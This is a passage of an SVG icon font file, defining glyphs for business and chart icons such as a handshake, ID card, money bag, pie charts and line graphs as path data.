<glyph glyph-name="handshake-deal" horiz-adv-x="1000" unicode="&#xe96f;" d="M200 367h-98c-22 0-39-17-39-38v-371c0-22 17-39 39-39h98c22 0 40 17 40 39v370c-1 22-18 39-40 39z m232-117h-97c-22 0-40-17-40-39v-253c0-22 18-39 40-39h98c22 0 39 17 39 39v253c0 22-18 39-40 39z m233 0h-97c-22 0-40-17-40-39v-253c0-22 18-39 40-39h97c22 0 40 17 40 39v253c0 22-18 39-40 39z m233 117h-98c-22 0-39-17-39-38v-371c0-22 17-39 39-39h98c22 0 40 17 40 39v370c0 22-18 39-40 39z m-293 336c-2 1-4 2-5 3l-114 35c-46 14-75-11-83-19-5-4-9-9-11-13l-50-117c-3-7-2-16 2-25 7-13 19-22 33-25 15-4 32 1 44 14 4 3 6 7 8 10l17 31c3 5 7 10 11 14 15 15 22 8 25 5 26-24 159-156 159-156 5-4 4-13-2-19-6-6-15-7-20-2l-37 37c-5 5-13 5-18 0-4-5-4-12 0-17l38-37c5-5 4-14-2-19-6-6-15-7-20-3l-37 37c-5 5-13 5-18 0-5-4-5-12 0-17l38-37c4-5 3-13-3-19-6-6-15-7-19-2l-38 36c-5 5-13 5-17 0-5-4-5-12 0-17l37-37c5-4 4-13-2-19-6-6-15-7-20-2l-46 45c7 10 5 24-5 33-10 11-27 12-37 2 10 10 9 26-2 37-11 11-28 11-37 2 9 10 8 26-3 36-10 11-27 12-37 3 10 9 9 26-2 36-10 10-25 12-35 4l-74 73c-5 4-13 4-18 0-5-5-5-13 0-17l74-73-22-21c-10-10-9-26 2-37 11-11 28-12 38-2-10-10-9-26 2-37 11-10 27-11 37-2-10-9-9-26 2-36 11-11 28-12 38-3-10-9-9-25 2-36 11-11 27-12 37-2l23 22 46-44c14-14 39-13 54 2 8 8 12 17 13 27 9 0 19 4 27 12 8 7 12 17 12 26 10 1 20 5 27 12 8 8 12 17 13 27 9 1 19 5 27 12 15 16 16 40 2 54l-19 19 78 77c5 4 5 12 0 17l-113 112z m186-28l-100 99c-10 9-25 9-35 0l-35-35c-10-9-10-25 0-34l100-98c10-10 25-10 35 0l35 34c10 9 10 25 0 34z m-53-50c-11 0-20 9-20 20 0 11 9 20 20 20s21-9 21-20c0-11-9-20-21-20z" />
<glyph glyph-name="id-card" horiz-adv-x="1000" unicode="&#xe970;" d="M476 212h-22c-11 0-20 9-20 20 0 4 2 8 5 10 12 13 23 29 30 46 2-1 3-2 5-2 12 0 26 27 26 45 0 18-2 32-13 32-2 0-3 0-5-1-1 49-13 110-88 110-78 0-87-61-88-109-1 0-2 0-3 0-12 0-13-14-13-32s14-45 26-45c1 0 2 0 4 1 7-17 18-33 30-45 3-3 4-7 4-11 0-11-9-20-20-20h-21c-46 0-82-36-82-82v-23c0-14 11-26 26-26h275c14 0 26 12 26 26v23c0 46-37 83-82 83z m274 226h-231c7-15 12-33 14-56 5-3 8-8 11-13h206c11 0 19 8 19 19v30c0 11-8 20-19 20z m0-126h-201c-5-21-19-43-37-48l-2-3v-19h240c11 0 19 9 19 20v30c0 11-8 20-19 20z m0-126h-157c11-17 17-36 17-57v-13h140c11 0 19 9 19 20v30c0 11-8 20-19 20z m69 462h-195c-2 0-3 2-3 4v104c0 1-2 3-4 3h-219c-2 0-3-2-3-3v-104c0-2-2-4-4-4h-210c-65 0-118-53-118-118v-471c0-65 53-118 118-118h638c66 0 119 53 119 118v471c0 65-53 118-119 118z m-369 52c0 1 2 3 3 3h109c1 0 3-2 3-3v-108c0-2-2-3-3-3h-108c-2 0-4 1-4 3 0 0 0 108 0 108z m432-641c0-34-28-62-63-62h-638c-34 0-62 28-62 62v471c0 34 28 62 62 62h210c2 0 3-1 3-3v-53c0-2 2-3 4-3h220c1 0 3 1 3 3v53c0 2 1 3 3 3h195c35 0 63-28 63-62l0-471z" />
<glyph glyph-name="meeting-add" horiz-adv-x="1000" unicode="&#xe971;" d="M313 460c0 5-3 8-8 8h-92c-5 0-9-3-9-8v-92c0-5 4-8 9-8h92c5 0 8 3 8 8v92z m155 8h-93c-4 0-8-3-8-8v-92c0-5 4-8 8-8h93c4 0 8 3 8 8v92c0 5-4 8-8 8z m-163-162h-92c-5 0-9-4-9-8v-93c0-4 4-8 9-8h92c5 0 8 4 8 8v93c0 4-3 8-8 8z m163 0h-93c-4 0-8-4-8-8v-93c0-4 4-8 8-8h93c4 0 8 4 8 8v93c0 4-4 8-8 8z m70 162c-5 0-8-3-8-8v-92c0-5 3-8 8-8h92c5 0 8 3 8 8v92c0 5-3 8-8 8h-92z m-315 158h21c13 0 24 11 24 24v114c0 13-11 24-24 24h-21c-13 0-24-11-24-24v-113c0-14 11-25 24-25z m377 0h21c13 0 24 11 24 24v114c0 13-11 24-24 24h-21c-13 0-24-11-24-24v-113c0-14 11-25 24-25z m-148-479h-284c-22 0-41 18-41 41v329h590v-127c4 0 9 0 13 0 17 0 33-2 48-4v268c0 30-24 55-54 55h-45v-59c0-32-26-58-58-58h-21c-32 0-58 26-58 58v59h-240v-59c0-32-26-58-58-58h-21c-32 0-58 26-58 58v59h-45c-30 0-55-25-55-55v-521c0-30 25-55 55-55h336c-3 17-5 34-5 52 0 5 0 11 1 17z m421 125c-37 37-87 60-142 62h-7c-59 0-111-23-149-62-38-38-62-91-62-149 0-30 6-58 17-83 11-25 26-47 45-66 38-38 90-61 149-61 116 0 211 94 211 210 0 58-24 111-62 149z m-49-180h-70v-69h-61v69h-69v62h69v69h61v-69h70v-62z" />
<glyph glyph-name="money-bag" horiz-adv-x="1000" unicode="&#xe972;" d="M813 52c8 25 12 53 12 87 0 184-125 323-228 387-15 9-18 26-7 39 118 142 76 225 9 166-73-64-123 22-259 54-104 25 8-142 66-221 11-14 6-32-9-42-102-65-222-202-222-383 0-36 5-66 13-91 6-17 5-42-2-58-6-19-6-34 3-42 8-8 23-8 40-3 17 5 41 5 58-2 57-25 131-31 213-31 83 0 158 6 216 32 16 7 40 7 57 2 19-7 35-6 43 2 10 9 9 26 1 47-7 16-9 41-4 57z m-239 61c-12-15-29-25-52-30v-44c-5-2-11-2-16-2-6 0-12 0-17 2v40h-4c-8 0-16 1-22 1-7 1-13 2-19 3-6 1-12 2-18 4-6 2-12 4-18 7 0 7 2 15 4 22 2 8 4 16 7 24 11-5 21-7 31-9 9-2 19-2 30-2 16 0 29 2 37 8 9 5 14 14 14 26 0 6-1 12-4 15-2 5-5 8-9 10-4 3-8 5-12 7-5 2-10 4-14 6l-20 8c-9 4-16 8-23 12-7 4-13 9-18 14-5 5-9 12-12 19-2 8-4 17-4 28 0 23 7 41 20 54 13 14 31 21 54 24v41c5 2 11 2 16 2 6 0 11 0 17-2v-40c10 0 20-2 30-4 9-2 19-5 30-9-2-15-6-29-13-43-4 1-7 3-11 4-4 2-8 3-13 4s-10 2-15 3c-6 0-12 1-19 1-5 0-9-1-14-1-4-1-8-2-12-5-3-2-6-4-8-8-3-4-4-9-4-15 0-5 1-9 3-13 1-3 4-6 7-9s6-4 10-6l12-5 23-10c10-4 18-8 26-12 8-4 15-9 20-15s10-13 13-21c3-8 5-19 5-31 0-21-6-39-18-53z" />
<glyph glyph-name="pie-chart" horiz-adv-x="1000" unicode="&#xe973;" d="M451 712c-214 0-388-174-388-389s174-388 388-388 389 174 389 388h-389v389z m487-344c0 107-44 204-114 275l-275-275h389z m-438 398v-389l275 275c-76 76-175 114-275 114z" />
<glyph glyph-name="presentation-alt" horiz-adv-x="1000" unicode="&#xe974;" d="M420 588h-144c-6 0-11-5-11-11v-147c0-6 5-10 11-10h144c6 0 11 4 11 10v147c0 6-5 11-11 11z m-144-278h448c5 0 10 5 10 11v37c0 6-5 10-10 10h-448c-6 0-11-4-11-10v-37c0-6 5-11 11-11z m447 277h-221c-5 0-10-4-10-10v-37c0-6 5-10 10-10h222c5 0 10 4 10 10v37c0 6-5 10-11 10z m0-109h-221c-5 0-10-5-10-11v-37c0-5 5-10 10-10h222c5 0 10 4 10 10v37c0 6-5 11-11 11z m-643 299v-85c0-5 5-10 10-10h48c5 0 10-4 10-10v-500c0-6 4-10 10-10h276c6 0 10-5 10-10v-164c0-6-4-10-10-10h-70c-5 0-10-5-10-10v-45c0-6 5-11 10-11h272c5 0 10 5 10 11v45c0 5-4 10-10 10h-70c-6 0-11 4-11 10v164c0 6 5 11 11 11h276c6 0 10 4 10 10v500c0 5 5 10 11 10h46c6 0 10 4 10 10v84c0 6-4 10-10 10h-819c-5 0-10-4-10-10z m706-560h-573c-6 0-10 5-10 10v443c0 6 4 10 10 10h573c6 0 10-4 10-10v-443c0-5-4-10-10-10z" />
<glyph glyph-name="presentation" horiz-adv-x="1000" unicode="&#xe975;" d="M63 767v-579c0-38 29-69 65-69h744c36 0 66 31 66 69v579h-875z m810-518c0-33-25-59-55-59h-635c-31 0-56 26-56 59v383h746v-383z m-179-267l-176 166c-4 4-11 6-17 6l-1 0-1 0c-6 0-13-2-17-6l-175-166c-9-9-9-22 0-31s23-8 32 0l139 133v-129c0-12 10-22 22-22s23 10 23 22v129l139-133c9-8 23-8 32 0 8 9 8 22 0 31z m-356 430l150 20c-4 25-15 49-33 70-52 59-145 66-207 17s-71-138-18-197c51-58 142-66 205-18l-97 108z m212 79h257v-26h-257v26z m0-70h257v-26h-257v26z m0-69h164v-27h-164v27z" />
<glyph glyph-name="stamp" horiz-adv-x="1000" unicode="&#xe976;" d="M911 136c-10 42-43 69-85 69-49 0-97 1-146 0-15-1-26 4-36 14-28 26-46 58-50 97-4 34 1 67 12 99 15 40 31 80 47 120 12 30 23 61 19 95-6 42-20 79-49 108-44 42-97 56-154 47-47-8-86-32-112-75-30-48-39-100-17-155 7-20 16-39 24-59 16-39 33-78 40-120 12-65-3-119-52-162-7-6-14-9-24-9-51 0-102 0-152 0-31 0-57-12-74-40-7-11-10-25-16-39v-128c7-16 22-12 35-13v-49c0-18 6-23 22-23h716c14 0 20 6 20 21 1 6 0 12 0 19v32h15c14 1 20 7 20 22 0 35 0 71 0 106 0 8-1 16-3 23z m-66-186h-689v35h689v-35z" />
<glyph glyph-name="stock-mobile" horiz-adv-x="1000" unicode="&#xe977;" d="M709 787h-418c-26 0-48-21-48-47v-780c0-26 22-48 48-48h418c26 0 48 22 48 48v780c0 26-22 47-48 47z m-250-45h82c5 0 10-5 10-10 0-5-5-10-10-10h-82c-5 0-10 5-10 10 0 5 5 10 10 10z m41-794c-15 0-27 12-27 27s12 27 27 27 27-12 27-27-12-27-27-27z m204 106c0-13-10-23-23-23h-362c-13 0-23 10-23 23v615c0 13 10 23 23 23h362c13 0 23-10 23-23v-615z m-272 21v159c0 13-10 23-23 23h-54c-13 0-23-10-23-23v-159h100z m118 0v205c0 12-10 22-23 22h-54c-13 0-23-10-23-22v-205h100z m118 0v282c0 12-10 23-23 23h-54c-13 0-23-10-23-23v-282h100z" />
<glyph glyph-name="chart-arrows-axis" horiz-adv-x="1000" unicode="&#xe978;" d="M992-2c-38 30-76 59-114 89-3 2-6 5-10 3-5-2-5-6-5-11 0-15-1-31 0-46 0-9-3-11-12-11-63 0-126 0-189 0-171 0-342 0-512 0-11 0-13 3-13 13 0 81 0 163 0 245 0 130 0 260 0 390 0 7 2 9 9 8 16 0 32 0 48 0 5 0 9 0 11 5 3 4 0 7-3 11-30 38-60 77-90 115-6 9-12 9-18 1l-90-116c-3-3-5-6-3-11 2-4 6-5 11-5 14 0 28 0 43 0 14 0 14 0 14-14l0-162 0-508c0-27 13-41 39-41 123 0 247 0 370 0h37c112 0 225 0 338 0 7 0 10-1 10-9-1-15 0-31 0-46 0-5 0-10 5-13 5-3 8 1 12 4 37 29 75 59 112 88 11 9 11 12 0 21z m-165 368c-5-3-9-6-13-9-50-36-100-72-151-109-6-4-11-5-18-3-34 9-69 18-104 27-7 2-12 0-17-7-34-43-68-86-102-130-6-8-9-9-16-1-41 51-82 101-123 152-6 7-9 8-15 1-29-29-59-57-88-86-6-4-8-9-8-16 1-36 1-71 1-106 0-22 0-22 21-22 208 0 415 0 622 0 10 0 12 2 12 12-1 38 0 76 0 114-1 60-1 121-1 183z m-655 63c1-41 0-82 0-123v-39c6 2 8 5 11 8 28 28 56 55 83 84 8 8 12 7 18-1l123-148c6-7 8-6 14 1 29 37 59 74 87 112 7 8 13 10 23 7 38-9 76-17 114-26 7-1 12-1 18 4 52 39 105 78 158 116 5 4 7 8 7 15-1 42-1 84-1 126v41c-5-1-7-4-10-6-51-41-103-83-154-124-6-5-10-5-17-4-39 11-79 20-119 31-7 1-12 0-16-6-5-8-11-15-16-23-25-33-51-66-75-100-5-5-8-7-12 0-2 2-4 5-6 7-40 50-80 100-120 150-4 6-7 8-13 1-30-30-61-60-91-90-4-4-6-8-6-13z" />
<glyph glyph-name="chart-bar-graph" horiz-adv-x="1000" unicode="&#xe979;" d="M615 1c0-14 3-18 16-17 38 1 75 0 113 0 0 210 0 420 0 631 0 9-2 11-11 11-39-1-79-1-118-1 0-3 0-7 0-10 0-205 0-410 0-614z m-159-9c0-6 3-8 13-8 34 0 67 0 100 0 12 0 16 1 16 9-1 26-1 53-1 79 0 69 0 138 1 206 0 9-4 11-18 11-32-1-64-1-96 0-12 0-16-2-15-10 0-47 0-95 0-143 0-48 0-96 0-144z m-147-8c33 1 67 1 100 0 12-1 16 4 15 18 0 71 0 142 0 213s0 142 0 213c1 13-3 17-13 16-34 0-68 0-102 0-10 0-14-4-13-16 0-143 0-285 0-428-1-12 3-16 13-16z m-160 0c33 0 67 0 100 0 12 0 15 2 15 10 0 40 0 79 0 119 0 39 0 79 0 119 0 7-3 9-13 9-34-1-68-1-102 0-11 0-14-2-14-9 1-80 1-160 0-239 0-7 3-9 14-9z m637 0c34 0 67 0 100 0 12 0 16 2 16 8-1 30-1 61-1 92 0 30 0 61 1 92 0 5-4 7-14 7-34-1-68-1-102 0-10 0-13-2-13-7 0-62 0-123 0-185 0-6 3-7 13-7z m203-21h-938v815c0 6-4 11-10 11h-30c-6 0-11-5-11-11v-856c0-6 5-11 11-11h978c6 0 11 5 11 11v30c0 6-5 11-11 11z" />
<glyph glyph-name="chart-flow-1" horiz-adv-x="1000" unicode="&#xe97a;" d="M978 96h-70c0 3 0 6 0 9 0 81 0 162 0 243 0 26-16 41-42 41-106 0-212 0-317 0-3 0-6 0-9 1v146h16c29 0 58 0 88 0 28 0 42 15 42 43 0 68 0 136 1 204 0 23-7 40-30 48h-310c-23-8-30-25-29-48 0-67 0-134 0-201 0-7 0-14 2-20 5-16 19-26 39-26 31 0 62 0 93 0h12v-147h-11l-315 0c-26 0-41-16-41-42 0-82 0-163 0-244 0-2 0-4-1-7h-74c-12 0-22-10-22-23v-182c0-12 10-22 22-22h249c13 0 23 10 23 22v182c0 13-10 23-23 23h-100v219h293v-221h-9c-21 0-41 0-62 0-23 0-38-15-38-38-1-48 0-96 0-144 0-20 11-32 29-39h236c23 8 30 25 30 48-1 44-1 87-1 131 0 28-14 42-42 42-22 0-44 0-67 0v221h293v-219h-104c-13 0-23-10-23-23v-182c0-12 10-22 23-22h249c12 0 22 10 22 22v182c0 13-10 23-22 23z" />
<glyph glyph-name="chart-flow-2" horiz-adv-x="1000" unicode="&#xe97b;" d="M836 8c-14 54-56 91-114 97-47 5-98-19-124-68-2-5-4-9-10-9-57 1-115 0-172 1-39 0-64 20-75 54-2 9-4 18-4 27l0 199c0 7 2 7 7 5 25-10 50-14 76-14 55 0 110 0 165 0 7 0 10-2 13-8 23-42 59-66 107-69 54-4 106 30 126 81 19 51 4 111-38 145-65 52-157 33-196-41-2-4-4-7-9-7-58 0-116 0-175 1-36 0-62 21-72 54-3 10-4 21-4 31 0 37 0 74 0 111 0 5 1 8 7 11 46 25 70 64 70 116-1 52-27 90-73 114-1 1-3 1-4 2-39 16-82 6-83 6-8-2-15-4-22-8-31-16-52-38-64-69-14-43-6-77 1-95 11-28 30-49 57-64 8-4 10-8 10-16 0-160 0-319 0-478 0-47 13-89 42-126 36-45 85-63 141-64 54 0 107 0 161 0 10 0 16-2 21-12 30-55 98-79 157-56 60 23 93 87 78 149z m-124 416c41-1 73-33 73-74 0-40-33-73-73-73-41 0-74 33-74 74 0 40 34 74 74 73z m-426 226c-40 0-73 33-73 73 0 41 33 74 73 74 41 0 74-33 74-73 0-41-33-75-74-74z m425-745c-40 0-73 33-73 73 0 41 34 74 74 74 41-1 73-34 73-75 0-40-33-72-74-72z" />
<glyph glyph-name="chart-flow" horiz-adv-x="1000" unicode="&#xe97c;" d="M359 150c93 0 187 0 281 0 6 0 9-2 11-9 5-25 24-41 50-41 49 0 97 0 145 0 32 0 53 20 54 51 0 16 0 32 0 48-1 30-20 51-50 51-50 1-100 1-150 0-27 0-44-16-49-42-2-6-4-8-10-8-94 0-188 0-282 0-6 0-9 1-9 8 1 61 1 122 0 183 0 6 2 9 9 9 94-1 188-1 282 0 6 0 9-2 10-9 4-25 24-41 49-41 50 0 100 0 150 0 26 0 47 18 49 44 2 21 2 41 0 62-2 25-23 44-49 44-50 0-99 0-149 0-26 0-45-16-50-42-1-6-4-8-10-8-94 0-188 0-282 0-7 0-8 3-8 9 0 26 0 53-1 79 0 9 3 11 12 11 29 0 59 0 89 0 56 2 99 45 99 102 0 31-1 61 0 92 3 54-39 108-105 107-24-1-49 0-74 0-59 0-119 1-179-1-52-2-91-47-92-99 0-31 0-62 0-94 0-7 0-15 2-23 9-50 49-83 100-84 29 0 57 0 86 0 10 1 12-2 12-12 0-87 0-175 0-262v-61c0-68 0-135 0-203 0-9-2-11-11-11-12 1-24 1-36 1-31-1-52-21-53-52 0-15 0-29 0-44 0-35 20-55 55-55 13 0 26 0 39 0l101 0c31 0 48 14 55 44 1 6 5 6 10 6 60 0 121 0 181 0 6 0 9-1 10-8 4-25 21-41 46-41 52-1 104-1 156 0 26 0 45 20 47 46 1 18 1 37 0 56-2 27-23 47-50 47-50 1-100 1-150 0-25 0-45-17-49-41-1-7-3-9-10-9-60 1-120 0-180 0-7 0-10 2-12 9-4 25-24 41-49 42-14 0-27 0-40-1-8 0-9 3-9 10 0 44 0 87 0 131-1 7 1 9 8 9z" />
<glyph glyph-name="chart-growth" horiz-adv-x="1000" unicode="&#xe97d;" d="M938-49v-22c0-9-8-16-17-16h-842c-9-1-16 7-16 16v842c0 9 7 17 16 17h22c9 0 16-8 16-17v-788c0-9 7-16 16-16h788c9 0 17-7 17-16z m-469 529l193-48c8-2 19 2 24 10l60 101c5 8 15 10 22 6l43-26c7-5 14-1 14 8l3 186c0 9-6 12-14 8l-162-90c-8-4-8-12-1-16l43-26c7-4 10-14 5-22l-40-66c-4-8-15-12-24-10l-182 46c-9 2-21-2-27-8l-207-207c-7-6-7-16 0-23l15-16c7-6 17-6 23 0l185 186c7 6 19 9 27 7z m-62-458h77c9 0 16 7 16 16v362c0 9-7 18-15 20-8 2-20-2-26-8l-57-57c-6-6-11-19-11-28v-289c0-9 7-16 16-16z m-180 180v-164c0-9 7-16 16-16h77c9 0 16 7 16 16v235c0 9-5 11-11 4l-68-67c-6-6-30 1-30-8z m492 173v-337c0-9 7-16 16-16h77c9 0 16 7 16 16v395c0 9-6 20-14 24l-27 16c-8 5-18 3-22-5l-38-63c-5-8-8-21-8-30z m-55-337v321c0 9-7 18-16 20l-78 19c-8 2-15-3-15-12v-348c0-9 7-16 16-16h77c9 0 16 7 16 16z" />
<glyph glyph-name="chart-histogram-alt" horiz-adv-x="1000" unicode="&#xe97e;" d="M974 642c-78 68-156 136-234 204-6 5-4 6-11 0l-222-194-14-13 0-1h6c40 0 80 0 120 0 4 0 6 0 5-5-4-22-9-44-16-65-50-167-181-306-350-358-58-18-116-25-176-21-16 1-31 3-46 5-8 1-14-5-13-12 2-5 5-7 10-8 104-36 211-45 320-28 93 15 180 47 259 100 138 94 224 222 253 387 1 4 3 5 7 5 33 0 66 0 100 0 1 0 3 0 5 1 0 2-2 2-3 3z m-79-413v376c0 1 0 2-1 2-1 0-2-1-2-2 0-1-1-1-1-2-20-93-59-176-118-250-2-3-2-5-2-8 0-163 0-326 0-490 0-4 1-5 5-5 38 0 75 0 113 0 7 0 6-1 6 7 0 124 0 248 0 372z m-186 53c-2-1-3-2-4-3-36-32-75-61-118-84-3-2-3-4-3-7 0-111 0-222 0-333 0-4 1-5 5-5 38 0 75 0 113 0 6 0 7 2 7 7-1 139-1 279-1 418v7h1z m-187-126c0 6 0 6-6 4-37-16-75-28-114-36-4-1-5-3-5-7 0-87 0-174 0-261 0-5 1-6 6-6 37 0 75 0 113 0 5 0 6 1 6 6 0 50 0 100 0 150v150z m-379-41c-39 6-77 15-115 28-4 1-5 0-5-4 0-47 0-94 0-142 0-47 0-94 0-141 0-5 2-6 7-6 37 0 75 0 113 0 4 0 5 1 5 5 0 85 0 170 0 254 0 4-1 6-5 6z m192-8c0 4-1 5-5 5-38-5-76-6-115-4-4 0-5-1-5-6 0-82 0-164 0-247 0-4 1-5 6-5 37 0 75 0 113 0 5 0 6 2 6 6 0 42 0 83 0 125 0 42 0 84 0 126z" />
<glyph glyph-name="chart-histogram" horiz-adv-x="1000" unicode="&#xe97f;" d="M275 255c-38-42-77-84-115-127-16-17-25-17-42-1-8 8-17 17-25 25-11 11-31 3-31-13v-271c0-10 8-18 18-18h209c10 0 18 8 18 18v375c0 17-21 24-32 12z m312 17c-21-23-42-45-62-68-17-17-26-18-43-1-24 22-47 44-70 65-13 12-34 3-34-14v-384c0-11 9-20 20-20h204c11 0 20 9 20 20v388c0 19-22 28-35 14z m339 177c-2 1-4 3-7 5-23 23-46 46-69 69-4 5-10 7-16 7h0c-6 0-12-3-16-7-40-43-80-87-120-130-3-4-5-9-5-15v-506c0-12 9-22 21-22h202c12 0 21 10 21 22v559c1 8-4 14-11 18z m-403-146c96 105 192 209 288 313 7 7 10 8 17 0 24-25 49-49 73-73 11-11 26-10 33 2 2 5 3 11 3 16 0 89 0 177 0 266 0 16-8 23-24 23-45 0-89 0-134 0s-89 0-134 0c-10 0-18-3-21-13-4-9-1-16 6-23 28-27 54-55 82-81 7-7 8-11 1-19-72-79-143-158-213-238-7-7-11-6-17 0-43 39-86 79-130 118-13 12-23 12-35-1-83-89-165-179-247-268-11-13-11-22 1-34l62-61c16-16 25-16 40 1 56 62 113 124 169 186 6 6 9 7 16 0 41-38 82-76 123-115 17-15 26-15 41 1z" />
<glyph glyph-name="chart-line-alt" horiz-adv-x="1000" unicode="&#xe980;" d="M1000-87h-552c-125 0-250 0-375-1-2 0-3 1-4 1v124h58v63h-58v125h58v63h-58v124h58v63h-58v124h58v63h-6c-1 1-3 1-4 1-16-1-31 0-47-1h-1v125h58v63h-120v0h-7c0-330 0-661 0-991 0-5 4-9 9-9 327 0 655 0 982 0 1 0 3 0 4 0 4-1 5 1 5 5 0 19 0 38 0 58z m-791 429c6-5 8-4 13 1 19 24 39 47 58 71 6 7 9 7 17 2 171-114 342-228 514-343 7-5 10-4 14 4 21 39 43 78 64 117 3 6 5 7 12 3 15-8 30-16 47-25-1 63-3 125-4 188-54-33-107-65-161-98 17-9 32-18 48-26 5-3 6-5 3-11-11-18-21-37-31-56-6-10-6-10-16-4-168 112-336 224-504 336-4 3-8 7-13 0-33-40-66-79-99-118-3-4-3-6 1-10 13-10 25-20 37-31z m267 67c5-3 7-2 10 2 6 8 13 15 19 23 4 6 7 5 13 2 59-40 118-79 177-119 6-4 8-4 12 2 19 35 39 70 59 105 39 68 79 137 118 206 4 7 6 8 13 4 12-8 24-14 36-21 10-6 10-6 10 5 0 56-1 113-1 170 0 2 1 4-2 7-53-31-106-62-161-94 17-10 32-19 47-27 6-3 7-6 3-12-48-84-95-167-143-251-4-7-6-8-13-3-56 37-112 74-167 112-4 2-7 6-12 0-20-25-41-50-61-74-4-4-4-6 1-9 14-9 28-18 42-28z m-265-318c1-1 3-2 5-4 2 2 4 4 5 6 59 71 118 141 176 211 4 5 4 7-1 10-14 9-28 18-41 28-5 3-8 2-11-2-15-18-29-35-44-53-42-51-85-102-128-153-3-4-6-6 0-10 13-11 26-22 39-33z" />
<glyph glyph-name="chart-line" horiz-adv-x="1000" unicode="&#xe981;" d="M248 28c39 0 70 31 70 69 0 24-12 45-30 58l0 0c24 59 47 118 71 177 1 3 2 5 3 7 3-1 6-1 10-1 9 0 17 2 24 4 16-24 32-48 49-72-12-12-19-29-19-47 0-39 31-70 70-70s70 31 70 70c0 25-14 47-33 59l0 1c27 79 53 159 79 239 1 0 1 1 1 2 2 0 5 0 7 0 13 0 26 4 37 10 30-30 60-60 90-90-6-11-10-23-10-36 0-39 31-70 70-70s69 31 69 70c0 25-13 47-34 59 28 81 55 163 82 244 2 0 4-1 7-1 38 0 69 32 69 70s-31 70-69 70-70-31-70-70c0-25 13-46 32-59l0-2c-27-79-54-159-80-239 0-1-1-2-1-3-2 0-4 0-5 0-14 0-27-4-38-11-30 31-60 61-90 91 7 10 10 23 10 36 0 39-31 70-69 70s-70-31-70-70c0-25 13-47 33-59l0-2c-26-76-52-152-77-228-1-5-2-9-4-12-2 0-4 0-6 0-9 0-17-1-25-4-16 24-32 48-48 72 12 12 19 29 19 47 0 39-32 70-70 70s-70-31-70-70c0-23 12-44 30-57-25-61-49-122-74-184l0 0c-3 0-7 0-10 0-39 0-70-31-70-69 0-38 32-69 70-69z m197-116c-125 0-249 0-373 0-2 0-3 0-4 0v124h58v62h-58v124h58v62h-58v124h58v62h-58v123h58v63h-6c-1 0-3 0-4 0-16-1-31 0-47 0h-1v123h58v63h-119v-1h-7c0-327 0-655 0-982 0-5 4-9 9-9 325 0 649 0 974 0 1 0 2 0 4 0 4-1 5 1 5 5-1 19 0 38 0 57h-547z" />
<glyph glyph-name="chart-pie-alt" horiz-adv-x="1000" unicode="&#xe982;" d="M342 159c-3 2-5 5-8 7-68 62-97 139-81 230 19 104 100 182 204 200 9 1 10 5 10 12 0 81 0 161 0 242h-10c-17-3-33-5-50-8-199-43-329-162-390-357-2-6-3-11-5-17-5-20-24-114 0-227 28-125 97-225 203-300 5-4 8-4 11 2 40 68 79 137 118 205 3 5 4 8-2 11z m607 409c-3 6-5 7-11 4-68-40-135-81-203-121-6-3-7-5-4-11 2-3 3-6 4-10 28-87 16-169-43-240-67-82-176-110-275-74-9 3-11 0-15-6-39-70-79-140-118-210l8-5c16-6 31-13 47-18 195-60 367-20 515 120 5 4 9 8 13 12 14 16 77 88 112 198 36 123 25 243-30 361z m-413 28c62-10 113-39 154-88 4-5 7-6 13-2 67 39 135 78 203 117 7 4 6 7 2 13-20 28-43 55-68 79-72 66-155 109-251 127-17 3-34 5-50 8h-10v-244c0-5-1-9 7-10z" />
<glyph glyph-name="chart-pie" horiz-adv-x="1000" unicode="&#xe983;" d="M437 308c-2 3-2 7-2 11l77 405c1 9-5 17-14 19-21 3-42 4-64 4-246 0-445-205-433-454 10-226 196-408 422-414 64-2 126 11 181 34 21 9 29 34 18 53l-185 342z m534 162c-6 16-25 23-41 16l-336-159c-15-8-21-27-13-42l177-327c8-15 28-20 43-10 120 77 199 212 199 365 0 55-10 108-29 157z m-410-52l330 157c12 6 17 20 10 32-57 105-158 184-277 213-13 4-26-5-28-18l-68-359c-3-18 16-33 33-25z" />
<glyph glyph-name="chart-radar-graph" horiz-adv-x="1000" unicode="&#xe984;" d="M503 850c-276 2-502-219-503-499-1-275 220-499 500-501 275 1 497 221 500 495 3 277-219 503-497 505z m2-966c-261-2-470 204-472 465-1 257 206 466 465 468 258 2 467-207 469-467 1-254-208-465-462-466z m128 337c-6-2-9-2-13 3-12 17-25 34-38 51-3 5-4 9-1 15 10 25 9 51-6 75-33 53-109 51-141-3-2-4-4-9-11-7-18 3-37 7-55 10-6 1-8 2-7 8 0 9-1 19-5 28-3 7-1 9 5 13 53 29 106 59 159 89 7 4 12 4 18-2 25-26 65-31 97-14 31 18 48 55 40 89-11 48-58 76-105 61-46-15-69-65-50-110 3-9 1-11-6-15-52-29-105-58-157-88-7-4-11-3-16 3-28 34-78 39-112 12-35-27-43-76-18-111 20-28 47-39 80-35 31 5 53 23 64 52 3 7 5 10 13 8 16-4 33-7 49-9 8-1 9-4 8-11-6-40 17-78 56-90 35-10 65 0 90 28 13-17 25-33 37-49 6-7 6-10-2-16-35-26-46-73-28-113 17-38 59-62 99-55 56 10 91 62 78 116-13 54-68 84-122 67z m-127 53c-27 0-48 20-48 46 0 27 20 48 47 48 26 1 47-20 48-46 1-26-21-48-47-48z" />
<glyph glyph-name="architecture-alt" horiz-adv-x="1000" unicode="&#xe985;" d="M321 86c96 11 192 27 290 22 8 0 19-4 19 12 0 13 0 22-17 25-74 14-148 30-222 44-11 2-18 7-24 16-31 44-62 87-92 130-16 22-37 34-63 35-25 0-50 0-75-1-44-1-74-31-74-74 0-100 0-200 0-300 0-13 3-17 17-17 59 1 118 0 178 0 25 0 25 0 19 25-11 48-23 96-35 145 1 0 2 1 3 1l46-52c8-9 16-13 30-11z m-94 302c90 1 168 68 168 164 3 88-69 168-163 170-91 2-167-72-169-163-2-94 71-172 164-171z m710-108v282c0 26-5 30-29 24-48-10-95-19-143-29-88-19-176-38-264-57-14-3-24-7-24-24 0-87 0-173-1-259 0-12 2-20 14-19 12 1 7 11 7 17 0 44 0 89 0 133v112c1 2 2 4 3 5l0 1 381 72c7-1 9-5 9-16 0-122 0-245 0-367 0-14-4-18-18-19-66-2-132-5-198-8-9 0-17 0-17-13 0-15 10-12 18-12 55 0 111 0 166 1 15 0 18-7 15-18-3-11-13-6-19-6-134-4-269 8-403-9-42-5-84-9-126-14-11-1-15-4-12-16 9-39 9-39 48-43l12-2c54-6 107-16 161-17 133-2 266 0 399-1 16 0 22 4 21 21 0 94 0 188 0 281z m-60 258c2 0 3 0 4 0h-4z m-533-521c-8 4-23-5-21 13 1 20 19 9 29 12 11 3 13-4 13-14 